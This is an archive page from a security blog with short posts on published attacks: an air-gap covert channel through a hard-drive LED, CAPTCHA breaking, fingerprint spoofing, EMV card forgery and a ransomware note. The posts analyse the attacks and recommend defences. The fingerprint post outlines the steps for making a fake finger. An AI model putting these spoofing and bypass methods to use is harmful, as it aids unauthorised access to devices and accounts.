Category Archive: Hack

Feb 23 2017

Malware Lets a Drone Steal Data by Watching a Computer’s Blinking LED

This news initially published by Wired has made the headlights of many news and blogs. Thus, I had to dive in and read the paper. This team already disclosed in the past the use of some covert channels such as temperature. Three researchers, GURI M., ZADOV B., and ELOVICI Y. have devised a new way to breach airgap. They use the hard-drive (HDD) LED as a covert channel. By reading from the hard drive with a given sequence, it is possible to control the LED without having to be a privileged user. The reading sequence modulates the emitted light that carries the covert channel.

They experimented with several normal computers and concluded that they were able to reach about 4K bit/s by reading 4KB sectors. Obviously, such throughput does require special equipment to record the blinking LED. Typical video cameras will not allow more than 15 bit/s depending on their frame per second (fps). Do not forget Shannon’s theorem about sampling. Thus, they used a photodiode or a specialized amplified light detectors. Only such kind of equipment can guarantee a good detection rate.

Using the HDD reading for a covert channel is not a new method. At Black Hat 2008, FILIOL E. et al. disclosed such attack but they used the clicking of the hard HDD, i.e., acoustic channel, rather than the LED, i.e., optical channel. This is an interesting presentation of many covert channels.

The new attack is nice and adding the drone component guarantees the buzz. Nevertheless, I believe it is not as dangerous as publicized. The issue is the malware itself. The malware has to be the exclusive entity accessing the HDD during the transmission. Indeed, if any concurrent process uses the HDD, it will mess up with the emitted message. Therefore, the researchers recommend turning off the disk caching (drop_caches for Linux). What is the likelihood that an air-gapped computer can run a malware as the exclusive process without being noticed? One of the characteristics of the malware is that it should be stealthy, thus probably not being alone to access the HDD.

The second issue is the synchronization with the spying eyes. The evil maid scenario (or evil drone) does not seem realistic. The malware should execute only during the presence of the spy; else it will be noticed (due to the exclusivity of access to HDD). The spy cannot signal its presence to the malware as the malware is air gapped thus cannot receive any incoming message. Thus, either they have to define in advance some rendez-vous, or the malware has to run repeatedly for a long period, i.e., reducing its stealthiness. If the spying device is “fixed,” using cameras is not realistic due to their low bandwidth, thus requesting the malware to run for long periods. Nevertheless, the spy may have installed special equipment and record everything and analyze later the recorded light and look for the malware sequences when the malware wakes up and plays. The spying device will have to exfiltrate stealthily a far larger message than the covert message, increasing the risk to be detected.

The attack is possible but seems more complex than what is publicized. The paper’s proposed countermeasures disclose the defense:

Another interesting solution is to execute a background process that frequently invokes random read and write operations; that way, the signal generated by the malicious process will get mixed up with a random noise, limiting the attack’s effectiveness.

As already told, I believe that in most cases, more than one process will be executing and accessing the HDD. If you are paranoid, you can always hide the LED. 

Reference:

Guri, Mordechai, Boris Zadov, and Yuval Elovici. “LED-It-GO Leaking a Lot of Data from Air-Gapped Computers via the (Small) Hard Drive LED,” February 2017. http://cyber.bgu.ac.il/advanced-cyber/system/files/LED-it-GO_0.pdf

Calmette, Vincent, Stephane Vallet, Eric Filiol, and Guy Le Bouter. “Passive and Active Leakage of Secret Data from Non Networked Computer.” Black Hat 2008, Las Vegas, NV, USA, 2008. https://www.researchgate.net/publication/228801499_Passive_and_Active_Leakage_of_Secret_Data_from_Non_Networked_Computer

Nov 20 2016

Law 7 – You Are the Weakest Link

laws7This post is the seventh post in a series of ten posts. The previous post explored the sixth law: Security is not stronger than its weakest link.  Although often neglected, the seventh law is fundamental.  It states that human users are often the weakest element of the security.

Humans are the weakest link for many reasons.  Often, they do not understand security or have an ill perceived perception of it.  For instance, security is often seen as an obstacle.  Therefore, users will circumvent it when security is an obstruction to the fulfillment of their task and will not apply security policies and procedures.  They do not believe that they are a worthwhile target for cyber-attacks.

Humans are the weakest link because they do not grasp the full impact of their security-related decisions.  How many people ignore the security warnings of their browser?  How many people understand the security consequences and constraints of Bring Your Own Device (BYOD) or Bring Your Own Cloud (BYOC)?  Employees put their company at risk by bad decisions.

Humans are the weakest link because they have intrinsic limitations.  Human memory is often feeble thus we end up with weak passwords or complex passwords written on a post-it.  Humans do not handle complexity correctly.  Unfortunately, security is too complex.

Humans are the weakest link because they can be easily deceived.  Social engineers use social interaction to influence people and convince them to perform actions that they are not expected to do, or to share information that they are not supposed to disclose.   For instance, phishing is an efficient contamination vector.

How can we mitigate the human risk?

  • Where possible, make decisions on behalf of the end user; as the end users are not necessarily able to make rational decisions on security issues, the designer should make the decisions when possible. Whenever the user has to decide, the consequences of his decision should be made clear to him to guide his decision.
  • Define secure defaults; the default value should always be set to that for the highest or, at least, an acceptable security level. User friendliness should not drive the default value, but rather security should.
  • Educate your employees; the best answer to social engineering is enabling employees to identify an ongoing social engineering attack. This detection is only possible by educating the employees about this kind of attack.  Training employees increases their security awareness and thus raises their engagement.
  • Train your security staff; the landscape of security threats and defense tools is changing quickly. Skilled attackers will use the latest exploits.  Therefore, it is imperative that the security personnel be aware of the latest techniques.  Operational security staff should have a significant part of their work time dedicated to continuous training.

Interestingly, with the current progress of Artificial Intelligence and Big Data analytics, will the new generation of security tools partly compensate this weakness?

If you find this post interesting, you may also be interested in my second book “Ten Laws for Security” that will be available end of this month.   Chapter 8 explores in details this law. The book will be available for instance at Springer or Amazon.

Jul 06 2016

An insight in Knox

Samsung provides for its Galaxy devices an enterprise mobile security solution Knox. Among the features, Knox offers Workspace that compartments the mobile device in two spaces: user space and Knox space. Of course, the Knox space is running in a TrustZone™ and executes only authenticated trusted applications. There is not much public information about the actual implementation of Knox.

Uri Kanonov and Avishai Wool have lifted a part of the veil by reverse engineering Knox 1.0. Their paper provides an interesting in-depth description of some secure mechanisms such a compartmentalization (based on SELinux) or encryption file system. They also disclose some vulnerabilities. The last section describes some enhancements available in Knox 2.3 as well as some remaining issues.

An interesting element of the paper is the list of lessons:

  • Component reuse is welcome, provided a proper protection for the added attack surface.
  • Protect the software code of secure components
  • Validating the application authorized to run in the Trust Zone is key for security
  • Hardware Root of Trust should be at the root of any secure container system
  • Avoid resource sharing; it increases the attack surface.
  • Check the integrity of the secure container periodically; only checking at boot time is insufficient.

If you want to learn more about Knox, this paper is a good reading.

Kanonov, Uri, and Avishai Wool. “Secure Containers in Android: The Samsung KNOX Case Study.” arXiv, May 27, 2016. http://arxiv.org/abs/1605.08567.

May 10 2016

A “charitable” ransomware

This is not a joke. Heimdal Security disclosed a new variant of ransomware combining CryptoWall 4 and CryptXX. It has all the usual components of ransomware. The ransom itself is high: five bitcoins (about $2,200). Usually, ransoms are around $500.

In addition to the exceptional price, the ransomware adds some social engineering tricks. In the ransom screen, you will find: Your money will be spent for the children charity. So that is mean that You will get a participation in this process too. Many children will receive presents and medical help!

And We trust that you are kind and honest person! Thank You very much! We wish You all the best! Your name will be in the main donors list and will stay in the charity history!

So do not hesitate to pay, it is for the kiddies L

Moreover, there is an additional benefit.

Also You will have a FREE tech support for solving any PC troubles for 3 years!

Trust us L

Remember the best practices for avoiding ransomware:

  • Backup your computer(s) regularly; Use a physical backup (air gaped) rather than a cloud-based one (unless it is disconnected). A new generation of ransomware also encrypts remote or cloud-based servers.
  • Do not be infected; do no click on suspicious attachments or links in emails; avoid ‘suspicious’ websites.
  • Protect your computer(s); up to date OS and antivirus

Apr 15 2016

Hacking reCAPTCHA (2)

In 2012, the hacking team DefCon 949 disclosed their method to break Google’s reCaptcha. They used weaknesses in the version dedicated to visually impaired persons. End of 2014, Google replaced its letter-warping version with a user-friendlier version. It is based on the recognition of a set of images illustrating an object within a set of nine images.

At Black Hat Asia 2016, S. Sivakorn, J. Polakis and A. Keromytis from Columbia disclosed a method to break this visual captcha. They used many tools, but the core of the attack is the use of image annotation services, such as Google Reverse Image Search (GRIS) or Clarifai. These tools return a best guess description of the image, i.e., a list of potential tags. For instance, for the picture of a go-ban illustrating the blog post about AlphaGo, Clarifai returns chess, desktop, strategy, wood, balance, no person, table, and game, whereas GRIS returns go game. They use many tricks to increase the efficiency. My preferred one is to use GRIS to locate a high-resolution instance of each proposed challenge. They discovered that the accuracy of these annotation services decreased with the resolution of the submitted image.

They obtained a 70% accuracy for Google reCaptcha and 83.5% for Facebook’s version.

Sivakorn, Suphannee, Jason Polakis, and Angelos D. Keromytis, “I’m Not a Human: Breaking the Google reCaptcha” presented at Black Hat Asia, Singapore, 2016.

 

Mar 30 2016

Easier fingerprint spoofing

In September 2013, the German Computer Chaos Club (CCC) demonstrated the first hack of Apple’s TouchID. Since then, they repeatedly defeated every new version both from Apple and Samsung. Their solution implies to create a dummy finger. This creation is a complex, lengthy process. It uses a typical photographic process with the copy of the actual fingerprint acting as the negative image. Thus, the master fingerprint is printed onto a transparent sheet at 1,200 dpi. This printed mask is exposed on the photosensitive PCB material. The PCB material is developed, etched and cleaned to create a mold. A thin coat of graphite spray is applied to improve the capacitive response. Finally, a thin film of white wood glue is smeared into the mold to make it opaque and create the fake finger.

Two researchers (K. CAO and A. JAIN) at the Michigan State University disclosed a new method to simplify the creation of the fake finger. They use conductive ink from AgIC. AgIC sells ink cartridges for Brother printers. Rather than making a rubber finger, they print a conductive 2D image of the fingerprint. And, they claim it works. Surprisingly, they scan the user’s fingerprint at 300 dpi whereas the CCC used 2,400 dpi to defeat the latest sensors.

As fingerprint on mobile devices will be used for more than simple authentication but also payment, it will be paramount to come with a new generation of biometrics sensors that also detect the liveliness of the scanned subject.

Nov 23 2015

Attackers are smart

In 2010, Steven MURDOCH, Ross ANDERSON, and their team disclosed a weakness in the EMV protocol. Most Credit / Debit card equipped with a chip use the EMV (Europay, MasterCard, Visa) protocol. The vulnerability enabled to bypass the authentication phase for a given category of transactions. The card does not condition transaction authorization on successful cardholder verification. At the time of disclosure, Ross’s team created a Proof Of Concept using an FPGA. The device was bulky. Thus, some people minored the criticality.

The team of David NACCACHE recently published an interesting paper disclosing an exemplary work on a real attack exploiting this vulnerability: “when organized crime applies academic results.” The team performed a non-destructive forensic analysis of forged smart cards that exploited this weakness. The attacker combined in a plastic smart card the chip of a stolen EMV card (in green on the picture) and an other smart card chip FUN. The FUN chip acted like a man in the middle attack. It intercepted the communication between the Point of Sales (PoS) and the actual EMV chip. The FUN chip filtered out the VerifyPIN commands. The EMV card did not verify the PIN and thus was not blocked in case of the presentation of wrong PINs. On the other side, the FUN chip acknowledged the PIN for the PoS which continues the fraudulent transaction.

Meanwhile, the PoS have been updated to prevent this attack.

This paper is an excellent example of forensics analysis as well as responsible disclosure. The paper was published after the problem was solved in the field. It discloses an example of a new potential class of attacks: Chip in The Middle.

Law 1: Attackers will always find their way. Moreover, they even read academic publications and use them.

Older posts «